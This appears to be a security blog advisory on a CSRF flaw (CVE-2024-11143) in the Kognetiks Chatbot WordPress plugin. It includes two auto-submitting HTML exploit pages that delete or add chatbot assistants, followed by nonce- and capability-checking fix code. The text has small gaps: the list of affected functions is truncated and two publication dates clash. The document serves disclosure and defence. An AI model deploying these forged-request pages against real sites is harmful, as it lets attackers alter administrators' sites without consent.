CVE-2024-11143 - Critical CSRF Vulnerability in Kognetiks Chatbot for WordPress Plugin - Full Analysis, Exploit, and Mitigation

Published: June 2024

What is CVE-2024-11143?

If you use the Kognetiks Chatbot for WordPress plugin, you need to pay attention: there's a serious security issue (CVE-2024-11143) affecting all versions up to and including 2.1.8. This vulnerability allows attackers to exploit your site using Cross-Site Request Forgery (CSRF) due to missing or incorrect nonce validation in several plugin functions.

In plain English: An attacker can trick you, as a site admin, into clicking a malicious link. If you do, they can modify your chatbot assistants—add, update, or even delete—*without your consent.*

delete_assistant

All these functions lack proper WordPress nonce verification. That means the plugin cannot verify if the actions are coming from a legitimate source, making CSRF attacks possible.

1. Attacker crafts a malicious request to the vulnerable functions.
2. Attacker tricks an admin (you) into visiting a page or clicking a link (for example, via email, comment, or social media).
3. The request is sent by your browser with your admin privileges, and Kognetiks Chatbot accepts it, believing it's legit.

Sample Exploit Code

Below is an example of a CSRF exploit targeting the delete_assistant function. Suppose your WordPress site is at https://yoursite.com and the attacker wants to delete an assistant with ID 5.

The attacker could host this HTML code on any website:

<!-- ATTACKER'S MALICIOUS PAGE -->
<html>
  <body>
    <form action="https://yoursite.com/wp-admin/admin-ajax.php" method="POST" id="csrfForm">
      <input type="hidden" name="action" value="delete_assistant">
      <input type="hidden" name="assistant_id" value="5">
    </form>
    <script>
      document.getElementById('csrfForm').submit(); // Auto-submit the form when admin visits
    </script>
  </body>
</html>

When a logged-in admin visits this attacker's page, the assistant with ID 5 is deleted—no confirmation, no warning.

To add a malicious assistant, the attacker may use:

<form action="https://yoursite.com/wp-admin/admin-ajax.php" method="POST" id="csrfAdd">
  <input type="hidden" name="action" value="add_new_assistant">
  <input type="hidden" name="assistant_name" value="Evil Assistant">
  <input type="hidden" name="assistant_config" value='{"actions":["do anything a bot can"]}'>
</form>
<script>
  document.getElementById('csrfAdd').submit();
</script>

Wordfence advisory:

https://www.wordfence.com/threat-intel/vulnerabilities/id/9c338337-333d-497d-9cc1-4d13bc15b814

Official CVE details:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11143

Plugin Page:

Kognetiks Chatbot for WordPress

Technical Notes: How Developers Should Fix

To protect against CSRF in WordPress, you should always verify nonces on actions that alter data. Example fix for the delete_assistant function:

// Before processing the request:
if ( ! isset($_POST['_wpnonce']) || ! wp_verify_nonce($_POST['_wpnonce'], 'delete_assistant_nonce') ) {
    wp_die('Security check failed');
}
// ... proceed with deletion
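For completeness, here is what a full admin-ajax handler looks like once the nonce is both issued to the admin page and checked on the server. This is an added example written for this page, not the plugin's own code; the function names, nonce action string, script handle and option key are assumptions. It goes beyond the snippet above by also checking the user's capability and validating the id, because a valid nonce only proves the request came from a page this site served to the logged-in user, not that the user may delete assistants.

```php
<?php
// Added example (not the plugin's code). Function names, the nonce action
// string, the script handle and the option key are assumptions.

// 1. Issue the nonce to the admin page's script. The nonce is bound to the
//    logged-in user and to the action string, so a third-party page cannot
//    know it and cannot include it in a forged form.
function example_chatbot_enqueue_admin_script( $hook_suffix ) {
    wp_enqueue_script( 'example-chatbot-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-chatbot-admin', 'exampleChatbot', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'delete_assistant_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_chatbot_enqueue_admin_script' );

// 2. Verify the nonce AND the caller's capability before touching data.
//    check_ajax_referer() aborts the request when the _wpnonce field is
//    missing or invalid, so a cross-site form like the one above never
//    reaches the deletion code.
function example_chatbot_delete_assistant() {
    check_ajax_referer( 'delete_assistant_nonce', '_wpnonce' );

    // A nonce is not an authorization check; enforce the capability too.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // Validate the id rather than trusting the raw POST value.
    $assistant_id = isset( $_POST['assistant_id'] ) ? absint( $_POST['assistant_id'] ) : 0;
    if ( 0 === $assistant_id ) {
        wp_send_json_error( array( 'message' => 'Invalid assistant id' ), 400 );
    }

    // Assumed storage: assistants kept as an id-keyed array in one option.
    $assistants = get_option( 'example_chatbot_assistants', array() );
    if ( ! isset( $assistants[ $assistant_id ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown assistant' ), 404 );
    }
    unset( $assistants[ $assistant_id ] );
    update_option( 'example_chatbot_assistants', $assistants );

    wp_send_json_success( array( 'deleted' => $assistant_id ) );
}
// Only the logged-in hook is registered; there is deliberately no
// wp_ajax_nopriv_ variant, so anonymous requests are not handled at all.
add_action( 'wp_ajax_delete_assistant', 'example_chatbot_delete_assistant' );
```

The legitimate admin.js then posts `action`, `assistant_id` and `_wpnonce: exampleChatbot.nonce` to `exampleChatbot.ajaxUrl`; a request without that nonce, such as the auto-submitted form above, is rejected before any deletion happens.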

Conclusion

CVE-2024-11143 is a critical CSRF vulnerability in the Kognetiks Chatbot for WordPress plugin, allowing attackers to modify your assistants by tricking you into clicking a malicious link. This is a serious threat to the integrity of your site and bot interactions.
Update your plugin NOW or disable it until a patch is released!

Stay safe, and always keep your plugins updated.

*You read it here first. Share this to help protect more WordPress sites!*

Timeline

Published on: 11/13/2024 03:15:05 UTC
Last modified on: 11/18/2024 15:03:56 UTC